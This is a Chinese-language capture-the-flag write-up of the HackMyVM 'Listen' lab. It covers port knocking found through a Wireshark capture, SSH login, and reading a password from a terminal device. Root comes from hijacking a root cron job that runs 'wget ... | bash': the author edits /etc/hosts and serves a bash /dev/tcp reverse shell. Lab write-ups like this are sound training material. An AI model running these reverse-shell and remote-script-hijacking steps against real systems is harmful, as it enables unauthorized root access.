HMV-Listen

HMV-Listen靶场复盘
本来想先做Vulnyx的Listen但是我用平时的方法修改不了ip，做不了

端口扫描

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.158       
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 10:13 CST
Nmap scan report for 192.168.179.158 (192.168.179.158)
Host is up (0.0022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp filtered http
MAC Address: 56:6C:79:7A:84:65 (Unknown)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   2.22 ms 192.168.179.158 (192.168.179.158)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.20 seconds

web探测

web首页没有什么信息

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.169.179.158    
<html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>

做之前群主有提醒，Listen这个名字就是要流量监听，所以用wireshark
wireshark这个应用我直接打开监听，提示我权限不足，搜索后用sudo打开 （mac系统）

(base) kakeru@bogon /Applications % sudo /Applications/Wireshark.app/Contents/MacOS/Wireshark

抓包后筛选靶机的ip，查看包内容，发现需要knock 1337端口，用到了knock服务，我要去修改一下这个配置
因为开机前获取不到ip，修改了靶机网卡，knock配置也要改 位置在/etc/knockd.conf

另一个包给了用户名和密码
konck这个端口之后，靶机的22和80端口就都打开了

┌──(root㉿kakeru)-[~/tmp]
└─# knock 192.168.179.158 1337 -v          
hitting tcp 192.168.179.158:1337
                                                                                                                     
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -p- 192.168.179.158
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 10:29 CST
Nmap scan report for 192.168.179.158 (192.168.179.158)
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 56:6C:79:7A:84:65 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 2.77 seconds

然后就可以用ssh登录到silence用户

提权

没有sudo权限
但是suid有一个home目录下leo用户的文件有suid

silence@listen:~$ find / -perm -4000 -user root -print 2>/dev/null
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/home/leo/poem
silence@listen:~$ cd /home
silence@listen:/home$ ls
leo  listen  silence

silence@listen:/home$ cd silence/
silence@listen:~$ ls
listen.sh  note.txt
silence@listen:~$ listen.sh
-bash: listen.sh: command not found
silence@listen:~$ cat note.txt 
"listen" told me that if I listen, I will hear his password....

提示listen “listen”用户可以得到密码

silence@listen:~$ cat listen.sh 
#!/bin/sh
cat /home/listen/password.txt > /dev/pts/4

运行这个脚本之后就可以得到密码，但是现在没有执行权限，只是可读的
这里卡住了一会，看了下wp，原来这个pts/4 是终端的窗口，所以开4个终端窗口，在第四个终端中就能看到
这个应该是个定时任务，等待一会就会在第四个终端窗口中出现密码(开四个ssh全都连接到silence)

silence@listen:~$ su - listen
Password: 
listen@listen:~$ 

成功切换到listen
有一个文件 ，而且用pspy64发现root会定时执行这个listentome.sh

listen@listen:~$ ls
listentome.sh  password.txt  user.txt
listen@listen:~$ cat listentome.sh 
wget -O - -q http://listen/ihearyou.sh | bash


2025/02/07 22:14:02 CMD: UID=0     PID=1070   | sh /home/listen/listentome.sh 
2025/02/07 22:14:02 CMD: UID=0     PID=1071   | sh /home/listen/listentome.sh 

这个马上就有思路了，修改host，把listen指向我们本机的http服务，把反弹shell的sh文件让靶机执行

127.0.0.1       localhost
192.168.179.11  listen

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

ctrl + o 回车 ctrl + x

┌──(root㉿kakeru)-[~/tmp]
└─# rm ihearyou.sh         
                                                                                                                     
┌──(root㉿kakeru)-[~/tmp]
└─# touch ihearyou.sh
                                                                                                                     
┌──(root㉿kakeru)-[~/tmp]
└─# cp reverse.sh ihearyou.sh
                                                                                                                     
┌──(root㉿kakeru)-[~/tmp]
└─# cat ihearyou.sh          
bash -i >& /dev/tcp/192.168.179.11/1234 0>&1
                                                                                                                     
┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

然后在另一个kali端口监听

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234             
id
bash: cannot set terminal process group (1123): Inappropriate ioctl for device
bash: no job control in this shell
root@listen:~# id
uid=0(root) gid=0(root) groups=0(root)
root@listen:~# 

完成